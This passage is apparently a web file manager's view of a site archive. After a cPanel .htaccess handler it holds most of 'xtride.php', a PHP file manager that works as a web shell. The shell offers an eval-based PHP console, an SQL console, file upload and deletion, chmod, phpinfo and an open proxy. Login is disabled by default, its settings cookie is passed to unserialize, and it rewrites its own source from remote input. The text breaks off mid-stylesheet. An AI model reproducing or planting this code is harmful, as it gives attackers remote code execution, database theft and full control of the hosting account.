Файловый менеджер - Редактировать - /home/gqdcvggs/go.imators.com/ia.imators.com.tar
Назад
.htaccess 0000644 00000000431 15114740474 0006347 0 ustar 00 # php -- BEGIN cPanel-generated handler, do not edit # Set the “ea-php81” package as the default “PHP” programming language. <IfModule mime_module> AddHandler application/x-httpd-ea-php81 .php .php8 .phtml </IfModule> # php -- END cPanel-generated handler, do not edit xtride.php 0000644 00000235135 15114742020 0006561 0 ustar 00 <?php /* PHP File manager ver 1.6 */ // Configuration — do not change manually! $authorization = '{"authorize":"0","login":"admin","password":"phpfm","cookie_name":"fm_user","days_authorization":"30","script":""}'; $php_templates = '{"Settings":"global $fm_config;\r\nvar_export($fm_config);","Backup SQL tables":"echo fm_backup_tables();"}'; $sql_templates = '{"All bases":"SHOW DATABASES;","All tables":"SHOW TABLES;"}'; $translation = '{"id":"ru","Add":"Добавить","Are you sure you want to delete this directory (recursively)?":"Вы уверены, что хотите удалить эту папку (рекурсивно)?","Are you sure you want to delete this file?":"Вы уверены, что хотите удалить этот файл?","Archiving":"Архивировать","Authorization":"Авторизация","Back":"Назад","Cancel":"Отмена","Chinese":"Китайский","Compress":"Сжать","Console":"Консоль","Cookie":"Куки","Created":"Создан","Date":"Дата","Days":"Дней","Decompress":"Распаковать","Delete":"Удалить","Deleted":"Удалено","Download":"Скачать","done":"закончена","Edit":"Редактировать","Enter":"Вход","English":"Английский","Error occurred":"Произошла ошибка","File manager":"Файловый менеджер","File selected":"Выбран файл","File updated":"Файл сохранен","Filename":"Имя файла","Files uploaded":"Файл загружен","French":"Французский","Generation time":"Генерация страницы","German":"Немецкий","Home":"Домой","Quit":"Выход","Language":"Язык","Login":"Логин","Manage":"Управление","Make directory":"Создать папку","Name":"Наименование","New":"Новое","New file":"Новый файл","no files":"нет файлов","Password":"Пароль","pictures":"изображения","Recursively":"Рекурсивно","Rename":"Переименовать","Reset":"Сбросить","Reset settings":"Сбросить настройки","Restore file time after editing":"Восстанавливать время файла после редактирования","Result":"Результат","Rights":"Права","Russian":"Русский","Save":"Сохранить","Select":"Выберите","Select the file":"Выберите файл","Settings":"Настройка","Show":"Показать","Show size of the folder":"Показывать размер папки","Size":"Размер","Spanish":"Испанский","Submit":"Отправить","Task":"Задача","templates":"шаблоны","Ukrainian":"Украинский","Upload":"Загрузить","Value":"Значение","Hello":"Привет","Found in files":"Найдено в файлах","Search":"Поиск","Recursive search": "Рекурсивный поиск","Mask":"Маска"}'; // end configuration // Preparations $starttime = explode(' ', microtime()); $starttime = $starttime[1] + $starttime[0]; $langs = array('en','ru','de','fr','uk'); $path = empty($_REQUEST['path']) ? $path = realpath('.') : realpath($_REQUEST['path']); $path = str_replace('\\', '/', $path) . '/'; $main_path=str_replace('\\', '/',realpath('./')); $phar_maybe = (version_compare(phpversion(),"5.3.0","<"))?true:false; $msg = ''; // service string $default_language = 'ru'; $detect_lang = true; $fm_version = 1.6; ini_set('display_errors', '1'); ini_set('display_startup_errors', '1'); error_reporting(E_ALL); //Authorization $auth = json_decode($authorization,true); $auth['authorize'] = isset($auth['authorize']) ? $auth['authorize'] : 0; $auth['days_authorization'] = (isset($auth['days_authorization'])&&is_numeric($auth['days_authorization'])) ? (int)$auth['days_authorization'] : 30; $auth['login'] = isset($auth['login']) ? $auth['login'] : 'admin'; $auth['password'] = isset($auth['password']) ? $auth['password'] : 'phpfm'; $auth['cookie_name'] = isset($auth['cookie_name']) ? $auth['cookie_name'] : 'fm_user'; $auth['script'] = isset($auth['script']) ? $auth['script'] : ''; // Little default config $fm_default_config = array ( 'make_directory' => true, 'new_file' => true, 'upload_file' => true, 'show_dir_size' => false, //if true, show directory size → maybe slow 'show_img' => true, 'show_php_ver' => true, 'show_php_ini' => false, // show path to current php.ini 'show_gt' => true, // show generation time 'enable_php_console' => true, 'enable_sql_console' => true, 'sql_server' => 'localhost', 'sql_username' => 'root', 'sql_password' => '', 'sql_db' => 'test_base', 'enable_proxy' => true, 'show_phpinfo' => true, 'show_xls' => true, 'fm_settings' => true, 'restore_time' => true, 'fm_restore_time' => false, ); if (empty($_COOKIE['fm_config'])) $fm_config = $fm_default_config; else $fm_config = unserialize($_COOKIE['fm_config']); // Change language if (isset($_POST['fm_lang'])) { setcookie('fm_lang', $_POST['fm_lang'], time() + (86400 * $auth['days_authorization'])); $_COOKIE['fm_lang'] = $_POST['fm_lang']; } $language = $default_language; // Detect browser language if($detect_lang && !empty($_SERVER['HTTP_ACCEPT_LANGUAGE']) && empty($_COOKIE['fm_lang'])){ $lang_priority = explode(',', $_SERVER['HTTP_ACCEPT_LANGUAGE']); if (!empty($lang_priority)){ foreach ($lang_priority as $lang_arr){ $lng = explode(';', $lang_arr); $lng = $lng[0]; if(in_array($lng,$langs)){ $language = $lng; break; } } } } // Cookie language is primary for ever $language = (empty($_COOKIE['fm_lang'])) ? $language : $_COOKIE['fm_lang']; // Localization $lang = json_decode($translation,true); if ($lang['id']!=$language) { $get_lang = file_get_contents('https://raw.githubusercontent.com/henriyzx/Filemanager/master/languages/' . $language . '.json'); if (!empty($get_lang)) { //remove unnecessary characters $translation_string = str_replace("'",''',json_encode(json_decode($get_lang),JSON_UNESCAPED_UNICODE)); $fgc = file_get_contents(__FILE__); $search = preg_match('#translation[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches); if (!empty($matches[1])) { $filemtime = filemtime(__FILE__); $replace = str_replace('{"'.$matches[1].'"}',$translation_string,$fgc); if (file_put_contents(__FILE__, $replace)) { $msg .= __('File updated'); } else $msg .= __('Error occurred'); if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime); } $lang = json_decode($translation_string,true); } } /* Functions */ //translation function __($text){ global $lang; if (isset($lang[$text])) return $lang[$text]; else return $text; }; //delete files and dirs recursively function fm_del_files($file, $recursive = false) { if($recursive && @is_dir($file)) { $els = fm_scan_dir($file, '', '', true); foreach ($els as $el) { if($el != '.' && $el != '..'){ fm_del_files($file . '/' . $el, true); } } } if(@is_dir($file)) { return rmdir($file); } else { return @unlink($file); } } //file perms function fm_rights_string($file, $if = false){ $perms = fileperms($file); $info = ''; if(!$if){ if (($perms & 0xC000) == 0xC000) { //Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { //Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { //Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { //Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { //Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { //Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { //FIFO pipe $info = 'p'; } else { //Unknown $info = 'u'; } } //Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); //Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); //World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } function fm_convert_rights($mode) { $mode = str_pad($mode,9,'-'); $trans = array('-'=>'0','r'=>'4','w'=>'2','x'=>'1'); $mode = strtr($mode,$trans); $newmode = '0'; $owner = (int) $mode[0] + (int) $mode[1] + (int) $mode[2]; $group = (int) $mode[3] + (int) $mode[4] + (int) $mode[5]; $world = (int) $mode[6] + (int) $mode[7] + (int) $mode[8]; $newmode .= $owner . $group . $world; return intval($newmode, 8); } function fm_chmod($file, $val, $rec = false) { $res = @chmod(realpath($file), $val); if(@is_dir($file) && $rec){ $els = fm_scan_dir($file); foreach ($els as $el) { $res = $res && fm_chmod($file . '/' . $el, $val, true); } } return $res; } //load files function fm_download($file_name) { if (!empty($file_name)) { if (file_exists($file_name)) { header("Content-Disposition: attachment; filename=" . basename($file_name)); header("Content-Type: application/force-download"); header("Content-Type: application/octet-stream"); header("Content-Type: application/download"); header("Content-Description: File Transfer"); header("Content-Length: " . filesize($file_name)); flush(); // this doesn't really matter. $fp = fopen($file_name, "r"); while (!feof($fp)) { echo fread($fp, 65536); flush(); // this is essential for large downloads } fclose($fp); die(); } else { header('HTTP/1.0 404 Not Found', true, 404); header('Status: 404 Not Found'); die(); } } } //show folder size function fm_dir_size($f,$format=true) { if($format) { $size=fm_dir_size($f,false); if($size<=1024) return $size.' bytes'; elseif($size<=1024*1024) return round($size/(1024),2).' Kb'; elseif($size<=1024*1024*1024) return round($size/(1024*1024),2).' Mb'; elseif($size<=1024*1024*1024*1024) return round($size/(1024*1024*1024),2).' Gb'; elseif($size<=1024*1024*1024*1024*1024) return round($size/(1024*1024*1024*1024),2).' Tb'; //:))) else return round($size/(1024*1024*1024*1024*1024),2).' Pb'; // ;-) } else { if(is_file($f)) return filesize($f); $size=0; $dh=opendir($f); while(($file=readdir($dh))!==false) { if($file=='.' || $file=='..') continue; if(is_file($f.'/'.$file)) $size+=filesize($f.'/'.$file); else $size+=fm_dir_size($f.'/'.$file,false); } closedir($dh); return $size+filesize($f); } } //scan directory function fm_scan_dir($directory, $exp = '', $type = 'all', $do_not_filter = false) { $dir = $ndir = array(); if(!empty($exp)){ $exp = '/^' . str_replace('*', '(.*)', str_replace('.', '\\.', $exp)) . '$/'; } if(!empty($type) && $type !== 'all'){ $func = 'is_' . $type; } if(@is_dir($directory)){ $fh = opendir($directory); while (false !== ($filename = readdir($fh))) { if(substr($filename, 0, 1) != '.' || $do_not_filter) { if((empty($type) || $type == 'all' || $func($directory . '/' . $filename)) && (empty($exp) || preg_match($exp, $filename))){ $dir[] = $filename; } } } closedir($fh); natsort($dir); } return $dir; } function fm_link($get,$link,$name,$title='') { if (empty($title)) $title=$name.' '.basename($link); return ' <a href="?'.$get.'='.base64_encode($link).'" title="'.$title.'">'.$name.'</a>'; } function fm_arr_to_option($arr,$n,$sel=''){ foreach($arr as $v){ $b=$v[$n]; $res.='<option value="'.$b.'" '.($sel && $sel==$b?'selected':'').'>'.$b.'</option>'; } return $res; } function fm_lang_form ($current='en'){ return ' <form name="change_lang" method="post" action=""> <select name="fm_lang" title="'.__('Language').'" onchange="document.forms[\'change_lang\'].submit()" > <option value="en" '.($current=='en'?'selected="selected" ':'').'>'.__('English').'</option> <option value="de" '.($current=='de'?'selected="selected" ':'').'>'.__('German').'</option> <option value="ru" '.($current=='ru'?'selected="selected" ':'').'>'.__('Russian').'</option> <option value="fr" '.($current=='fr'?'selected="selected" ':'').'>'.__('French').'</option> <option value="uk" '.($current=='uk'?'selected="selected" ':'').'>'.__('Ukrainian').'</option> </select> </form> '; } function fm_root($dirname){ return ($dirname=='.' OR $dirname=='..'); } function fm_php($string){ $display_errors=ini_get('display_errors'); ini_set('display_errors', '1'); ob_start(); eval(trim($string)); $text = ob_get_contents(); ob_end_clean(); ini_set('display_errors', $display_errors); return $text; } //SHOW DATABASES function fm_sql_connect(){ global $fm_config; return new mysqli($fm_config['sql_server'], $fm_config['sql_username'], $fm_config['sql_password'], $fm_config['sql_db']); } function fm_sql($query){ global $fm_config; $query=trim($query); ob_start(); $connection = fm_sql_connect(); if ($connection->connect_error) { ob_end_clean(); return $connection->connect_error; } $connection->set_charset('utf8'); $queried = mysqli_query($connection,$query); if ($queried===false) { ob_end_clean(); return mysqli_error($connection); } else { if(!empty($queried)){ while($row = mysqli_fetch_assoc($queried)) { $query_result[]= $row; } } $vdump=empty($query_result)?'':var_export($query_result,true); ob_end_clean(); $connection->close(); return '<pre>'.stripslashes($vdump).'</pre>'; } } function fm_backup_tables($tables = '*', $full_backup = true) { global $path; $mysqldb = fm_sql_connect(); $delimiter = "; \n \n"; if($tables == '*') { $tables = array(); $result = $mysqldb->query('SHOW TABLES'); while($row = mysqli_fetch_row($result)) { $tables[] = $row[0]; } } else { $tables = is_array($tables) ? $tables : explode(',',$tables); } $return=''; foreach($tables as $table) { $result = $mysqldb->query('SELECT * FROM '.$table); $num_fields = mysqli_num_fields($result); $return.= 'DROP TABLE IF EXISTS `'.$table.'`'.$delimiter; $row2 = mysqli_fetch_row($mysqldb->query('SHOW CREATE TABLE '.$table)); $return.=$row2[1].$delimiter; if ($full_backup) { for ($i = 0; $i < $num_fields; $i++) { while($row = mysqli_fetch_row($result)) { $return.= 'INSERT INTO `'.$table.'` VALUES('; for($j=0; $j<$num_fields; $j++) { $row[$j] = addslashes($row[$j]); $row[$j] = str_replace("\n","\\n",$row[$j]); if (isset($row[$j])) { $return.= '"'.$row[$j].'"' ; } else { $return.= '""'; } if ($j<($num_fields-1)) { $return.= ','; } } $return.= ')'.$delimiter; } } } else { $return = preg_replace("#AUTO_INCREMENT=[\d]+ #is", '', $return); } $return.="\n\n\n"; } //save file $file=gmdate("Y-m-d_H-i-s",time()).'.sql'; $handle = fopen($file,'w+'); fwrite($handle,$return); fclose($handle); $alert = 'onClick="if(confirm(\''. __('File selected').': \n'. $file. '. \n'.__('Are you sure you want to delete this file?') . '\')) document.location.href = \'?delete=' . $file . '&path=' . $path . '\'"'; return $file.': '.fm_link('download',$path.$file,__('Download'),__('Download').' '.$file).' <a href="#" title="' . __('Delete') . ' '. $file . '" ' . $alert . '>' . __('Delete') . '</a>'; } function fm_restore_tables($sqlFileToExecute) { $mysqldb = fm_sql_connect(); $delimiter = "; \n \n"; // Load and explode the sql file $f = fopen($sqlFileToExecute,"r+"); $sqlFile = fread($f,filesize($sqlFileToExecute)); $sqlArray = explode($delimiter,$sqlFile); //Process the sql file by statements foreach ($sqlArray as $stmt) { if (strlen($stmt)>3){ $result = $mysqldb->query($stmt); if (!$result){ $sqlErrorCode = mysqli_errno($mysqldb->connection); $sqlErrorText = mysqli_error($mysqldb->connection); $sqlStmt = $stmt; break; } } } if (empty($sqlErrorCode)) return __('Success').' — '.$sqlFileToExecute; else return $sqlErrorText.'<br/>'.$stmt; } function fm_img_link($filename){ return './'.basename(__FILE__).'?img='.base64_encode($filename); } function fm_home_style(){ return ' input, input.fm_input { text-indent: 2px; } input, textarea, select, input.fm_input { color: black; font: normal 8pt Verdana, Arial, Helvetica, sans-serif; border-color: black; background-color: #FCFCFC none !important; border-radius: 0; padding: 2px; } input.fm_input { background: #FCFCFC none !important; cursor: pointer; } .home { background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAAgRQTFRF/f396Ojo////tT02zr+fw66Rtj432TEp3MXE2DAr3TYp1y4mtDw2/7BM/7BOqVpc/8l31jcqq6enwcHB2Tgi5jgqVpbFvra2nBAV/Pz82S0jnx0W3TUkqSgi4eHh4Tsre4wosz026uPjzGYd6Us3ynAydUBA5Kl3fm5eqZaW7ODgi2Vg+Pj4uY+EwLm5bY9U//7jfLtC+tOK3jcm/71u2jYo1UYh5aJl/seC3jEm12kmJrIA1jMm/9aU4Lh0e01BlIaE///dhMdC7IA//fTZ2c3MW6nN30wf95Vd4JdXoXVos8nE4efN/+63IJgSnYhl7F4csXt89GQUwL+/jl1c41Aq+fb2gmtI1rKa2C4kJaIA3jYrlTw5tj423jYn3cXE1zQoxMHBp1lZ3Dgmqiks/+mcjLK83jYkymMV3TYk//HM+u7Whmtr0odTpaOjfWJfrHpg/8Bs/7tW/7Ve+4U52DMm3MLBn4qLgNVM6MzB3lEflIuL/+jA///20LOzjXx8/7lbWpJG2C8k3TosJKMA1ywjopOR1zYp5Dspiay+yKNhqKSk8NW6/fjns7Oz2tnZuz887b+W3aRY/+ms4rCE3Tot7V85bKxjuEA3w45Vh5uhq6am4cFxgZZW/9qIuwgKy0sW+ujT4TQntz423C8i3zUj/+Kw/a5d6UMxuL6wzDEr////cqJQfAAAAKx0Uk5T////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////AAWVFbEAAAAZdEVYdFNvZnR3YXJlAEFkb2JlIEltYWdlUmVhZHlxyWU8AAAA2UlEQVQoU2NYjQYYsAiE8U9YzDYjVpGZRxMiECitMrVZvoMrTlQ2ESRQJ2FVwinYbmqTULoohnE1g1aKGS/fNMtk40yZ9KVLQhgYkuY7NxQvXyHVFNnKzR69qpxBPMez0ETAQyTUvSogaIFaPcNqV/M5dha2Rl2Timb6Z+QBDY1XN/Sbu8xFLG3eLDfl2UABjilO1o012Z3ek1lZVIWAAmUTK6L0s3pX+jj6puZ2AwWUvBRaphswMdUujCiwDwa5VEdPI7ynUlc7v1qYURLquf42hz45CBPDtwACrm+RDcxJYAAAAABJRU5ErkJggg=="); background-repeat: no-repeat; }'; } function fm_config_checkbox_row($name,$value) { global $fm_config; return '<tr><td class="row1"><input id="fm_config_'.$value.'" name="fm_config['.$value.']" value="1" '.(empty($fm_config[$value])?'':'checked="true"').' type="checkbox"></td><td class="row2 whole"><label for="fm_config_'.$value.'">'.$name.'</td></tr>'; } function fm_protocol() { if (isset($_SERVER['HTTP_SCHEME'])) return $_SERVER['HTTP_SCHEME'].'://'; if (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') return 'https://'; if (isset($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == 443) return 'https://'; if (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') return 'https://'; return 'http://'; } function fm_site_url() { return fm_protocol().$_SERVER['HTTP_HOST']; } function fm_url($full=false) { $host=$full?fm_site_url():'.'; return $host.'/'.basename(__FILE__); } function fm_home($full=false){ return ' <a href="'.fm_url($full).'" title="'.__('Home').'"><span class="home"> </span></a>'; } function fm_run_input($lng) { global $fm_config; $return = !empty($fm_config['enable_'.$lng.'_console']) ? ' <form method="post" action="'.fm_url().'" style="display:inline"> <input type="submit" name="'.$lng.'run" value="'.strtoupper($lng).' '.__('Console').'"> </form> ' : ''; return $return; } function fm_url_proxy($matches) { $link = str_replace('&','&',$matches[2]); $url = isset($_GET['url'])?$_GET['url']:''; $parse_url = parse_url($url); $host = $parse_url['scheme'].'://'.$parse_url['host'].'/'; if (substr($link,0,2)=='//') { $link = substr_replace($link,fm_protocol(),0,2); } elseif (substr($link,0,1)=='/') { $link = substr_replace($link,$host,0,1); } elseif (substr($link,0,2)=='./') { $link = substr_replace($link,$host,0,2); } elseif (substr($link,0,4)=='http') { //alles machen wunderschon } else { $link = $host.$link; } if ($matches[1]=='href' && !strripos($link, 'css')) { $base = fm_site_url().'/'.basename(__FILE__); $baseq = $base.'?proxy=true&url='; $link = $baseq.urlencode($link); } elseif (strripos($link, 'css')){ //как-то тоже подменять надо } return $matches[1].'="'.$link.'"'; } function fm_tpl_form($lng_tpl) { global ${$lng_tpl.'_templates'}; $tpl_arr = json_decode(${$lng_tpl.'_templates'},true); $str = ''; foreach ($tpl_arr as $ktpl=>$vtpl) { $str .= '<tr><td class="row1"><input name="'.$lng_tpl.'_name[]" value="'.$ktpl.'"></td><td class="row2 whole"><textarea name="'.$lng_tpl.'_value[]" cols="55" rows="5" class="textarea_input">'.$vtpl.'</textarea> <input name="del_'.rand().'" type="button" onClick="this.parentNode.parentNode.remove();" value="'.__('Delete').'"/></td></tr>'; } return ' <table> <tr><th colspan="2">'.strtoupper($lng_tpl).' '.__('templates').' '.fm_run_input($lng_tpl).'</th></tr> <form method="post" action=""> <input type="hidden" value="'.$lng_tpl.'" name="tpl_edited"> <tr><td class="row1">'.__('Name').'</td><td class="row2 whole">'.__('Value').'</td></tr> '.$str.' <tr><td colspan="2" class="row3"><input name="res" type="button" onClick="document.location.href = \''.fm_url().'?fm_settings=true\';" value="'.__('Reset').'"/> <input type="submit" value="'.__('Save').'" ></td></tr> </form> <form method="post" action=""> <input type="hidden" value="'.$lng_tpl.'" name="tpl_edited"> <tr><td class="row1"><input name="'.$lng_tpl.'_new_name" value="" placeholder="'.__('New').' '.__('Name').'"></td><td class="row2 whole"><textarea name="'.$lng_tpl.'_new_value" cols="55" rows="5" class="textarea_input" placeholder="'.__('New').' '.__('Value').'"></textarea></td></tr> <tr><td colspan="2" class="row3"><input type="submit" value="'.__('Add').'" ></td></tr> </form> </table> '; } function find_text_in_files($dir, $mask, $text) { $results = array(); if ($handle = opendir($dir)) { while (false !== ($entry = readdir($handle))) { if ($entry != "." && $entry != "..") { $path = $dir . "/" . $entry; if (is_dir($path)) { $results = array_merge($results, find_text_in_files($path, $mask, $text)); } else { if (fnmatch($mask, $entry)) { $contents = file_get_contents($path); if (strpos($contents, $text) !== false) { $results[] = str_replace('//', '/', $path); } } } } } closedir($handle); } return $results; } /* End Functions */ // authorization if ($auth['authorize']) { if (isset($_POST['login']) && isset($_POST['password'])){ if (($_POST['login']==$auth['login']) && ($_POST['password']==$auth['password'])) { setcookie($auth['cookie_name'], $auth['login'].'|'.md5($auth['password']), time() + (86400 * $auth['days_authorization'])); $_COOKIE[$auth['cookie_name']]=$auth['login'].'|'.md5($auth['password']); } } if (!isset($_COOKIE[$auth['cookie_name']]) OR ($_COOKIE[$auth['cookie_name']]!=$auth['login'].'|'.md5($auth['password']))) { echo ' <!doctype html> <html> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <title>'.__('File manager').'</title> </head> <body> <form action="" method="post"> '.__('Login').' <input name="login" type="text"> '.__('Password').' <input name="password" type="password"> <input type="submit" value="'.__('Enter').'" class="fm_input"> </form> '.fm_lang_form($language).' </body> </html> '; die(); } if (isset($_POST['quit'])) { unset($_COOKIE[$auth['cookie_name']]); setcookie($auth['cookie_name'], '', time() - (86400 * $auth['days_authorization'])); header('Location: '.fm_site_url().$_SERVER['REQUEST_URI']); } } // Change config if (isset($_GET['fm_settings'])) { if (isset($_GET['fm_config_delete'])) { unset($_COOKIE['fm_config']); setcookie('fm_config', '', time() - (86400 * $auth['days_authorization'])); header('Location: '.fm_url().'?fm_settings=true'); exit(0); } elseif (isset($_POST['fm_config'])) { $fm_config = $_POST['fm_config']; setcookie('fm_config', serialize($fm_config), time() + (86400 * $auth['days_authorization'])); $_COOKIE['fm_config'] = serialize($fm_config); $msg = __('Settings').' '.__('done'); } elseif (isset($_POST['fm_login'])) { if (empty($_POST['fm_login']['authorize'])) $_POST['fm_login'] = array('authorize' => '0') + $_POST['fm_login']; $fm_login = json_encode($_POST['fm_login']); $fgc = file_get_contents(__FILE__); $search = preg_match('#authorization[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches); if (!empty($matches[1])) { $filemtime = filemtime(__FILE__); $replace = str_replace('{"'.$matches[1].'"}',$fm_login,$fgc); if (file_put_contents(__FILE__, $replace)) { $msg .= __('File updated'); if ($_POST['fm_login']['login'] != $auth['login']) $msg .= ' '.__('Login').': '.$_POST['fm_login']['login']; if ($_POST['fm_login']['password'] != $auth['password']) $msg .= ' '.__('Password').': '.$_POST['fm_login']['password']; $auth = $_POST['fm_login']; } else $msg .= __('Error occurred'); if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime); } } elseif (isset($_POST['tpl_edited'])) { $lng_tpl = $_POST['tpl_edited']; if (!empty($_POST[$lng_tpl.'_name'])) { $fm_php = json_encode(array_combine($_POST[$lng_tpl.'_name'],$_POST[$lng_tpl.'_value']),JSON_HEX_APOS); } elseif (!empty($_POST[$lng_tpl.'_new_name'])) { $fm_php = json_encode(json_decode(${$lng_tpl.'_templates'},true)+array($_POST[$lng_tpl.'_new_name']=>$_POST[$lng_tpl.'_new_value']),JSON_HEX_APOS); } if (!empty($fm_php)) { $fgc = file_get_contents(__FILE__); $search = preg_match('#'.$lng_tpl.'_templates[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches); if (!empty($matches[1])) { $filemtime = filemtime(__FILE__); $replace = str_replace('{"'.$matches[1].'"}',$fm_php,$fgc); if (file_put_contents(__FILE__, $replace)) { ${$lng_tpl.'_templates'} = $fm_php; $msg .= __('File updated'); } else $msg .= __('Error occurred'); if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime); } } else $msg .= __('Error occurred'); } } // Just show image if (isset($_GET['img'])) { $file=base64_decode($_GET['img']); if ($info=getimagesize($file)){ switch ($info[2]){ //1=GIF, 2=JPG, 3=PNG, 4=SWF, 5=PSD, 6=BMP case 1: $ext='gif'; break; case 2: $ext='jpeg'; break; case 3: $ext='png'; break; case 6: $ext='bmp'; break; default: die(); } header("Content-type: image/$ext"); echo file_get_contents($file); die(); } } // Just download file if (isset($_GET['download'])) { $file=base64_decode($_GET['download']); fm_download($file); } // Just show info if (isset($_GET['phpinfo'])) { phpinfo(); die(); } // Mini proxy, many bugs! if (isset($_GET['proxy']) && (!empty($fm_config['enable_proxy']))) { $url = isset($_GET['url'])?urldecode($_GET['url']):''; $proxy_form = ' <div style="position:relative;z-index:100500;background: linear-gradient(to bottom, #e4f5fc 0%,#bfe8f9 50%,#9fd8ef 51%,#2ab0ed 100%);"> <form action="" method="GET"> <input type="hidden" name="proxy" value="true"> '.fm_home().' <a href="'.$url.'" target="_blank">Url</a>: <input type="text" name="url" value="'.$url.'" size="55"> <input type="submit" value="'.__('Show').'" class="fm_input"> </form> </div> '; if ($url) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_USERAGENT, 'Den1xxx test proxy'); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,0); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_REFERER, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER,true); $result = curl_exec($ch); curl_close($ch); //$result = preg_replace('#(src)=["\'][http://]?([^:]*)["\']#Ui', '\\1="'.$url.'/\\2"', $result); $result = preg_replace_callback('#(href|src)=["\'][http://]?([^:]*)["\']#Ui', 'fm_url_proxy', $result); $result = preg_replace('%(<body.*?>)%i', '$1'.'<style>'.fm_home_style().'</style>'.$proxy_form, $result); echo $result; die(); } } ?> <!doctype html> <html> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <title><?=__('File manager')?></title> <style> body { background-color: white; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 8pt; margin: 0px; } a:link, a:active, a:visited { color: #006699; text-decoration: none; } a:hover { color: #DD6900; text-decoration: underline; } a.th:link { color: #FFA34F; text-decoration: none; } a.th:active { color: #FFA34F; text-decoration: none; } a.th:visited { color: #FFA34F; text-decoration: none; } a.th:hover { color: #FFA34F; text-decoration: underline; } table.bg { background-color: #ACBBC6 } th, td { font: normal 8pt Verdana, Arial, Helvetica, sans-serif; padding: 3px; } th { height: 25px; background-color: #006699; color: #FFA34F; font-weight: bold; font-size: 11px; } .row1 { background-color: #EFEFEF; } .row2 { background-color: #DEE3E7; } .row3 { background-color: #D1D7DC; padding: 5px; } tr.row1:hover { background-color: #F3FCFC; } tr.row2:hover { background-color: #F0F6F6; } .whole { width: 100%; } .all tbody td:first-child{width:100%;} textarea { font: 9pt 'Courier New', courier; line-height: 125%; padding: 5px; } .textarea_input { height: 1em; } .textarea_input:focus { height: auto; } input[type=submit]{ background: #FCFCFC none !important; cursor: pointer; } .folder { background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAKT2lDQ1BQaG90b3Nob3AgSUNDIHByb2ZpbGUAAHjanVNnVFPpFj333vRCS4iAlEtvUhUIIFJCi4AUkSYqIQkQSoghodkVUcERRUUEG8igiAOOjoCMFVEsDIoK2AfkIaKOg6OIisr74Xuja9a89+bN/rXXPues852zzwfACAyWSDNRNYAMqUIeEeCDx8TG4eQuQIEKJHAAEAizZCFz/SMBAPh+PDwrIsAHvgABeNMLCADATZvAMByH/w/qQplcAYCEAcB0kThLCIAUAEB6jkKmAEBGAYCdmCZTAKAEAGDLY2LjAFAtAGAnf+bTAICd+Jl7AQBblCEVAaCRACATZYhEAGg7AKzPVopFAFgwABRmS8Q5ANgtADBJV2ZIALC3AMDOEAuyAAgMADBRiIUpAAR7AGDIIyN4AISZABRG8lc88SuuEOcqAAB4mbI8uSQ5RYFbCC1xB1dXLh4ozkkXKxQ2YQJhmkAuwnmZGTKBNA/g88wAAKCRFRHgg/P9eM4Ors7ONo62Dl8t6r8G/yJiYuP+5c+rcEAAAOF0ftH+LC+zGoA7BoBt/qIl7gRoXgugdfeLZrIPQLUAoOnaV/Nw+H48PEWhkLnZ2eXk5NhKxEJbYcpXff5nwl/AV/1s+X48/Pf14L7iJIEyXYFHBPjgwsz0TKUcz5IJhGLc5o9H/LcL//wd0yLESWK5WCoU41EScY5EmozzMqUiiUKSKcUl0v9k4t8s+wM+3zUAsGo+AXuRLahdYwP2SycQWHTA4vcAAPK7b8HUKAgDgGiD4c93/+8//UegJQCAZkmScQAAXkQkLlTKsz/HCAAARKCBKrBBG/TBGCzABhzBBdzBC/xgNoRCJMTCQhBCCmSAHHJgKayCQiiGzbAdKmAv1EAdNMBRaIaTcA4uwlW4Dj1wD/phCJ7BKLyBCQRByAgTYSHaiAFiilgjjggXmYX4IcFIBBKLJCDJiBRRIkuRNUgxUopUIFVIHfI9cgI5h1xGupE7yAAygvyGvEcxlIGyUT3UDLVDuag3GoRGogvQZHQxmo8WoJvQcrQaPYw2oefQq2gP2o8+Q8cwwOgYBzPEbDAuxsNCsTgsCZNjy7EirAyrxhqwVqwDu4n1Y8+xdwQSgUXACTYEd0IgYR5BSFhMWE7YSKgg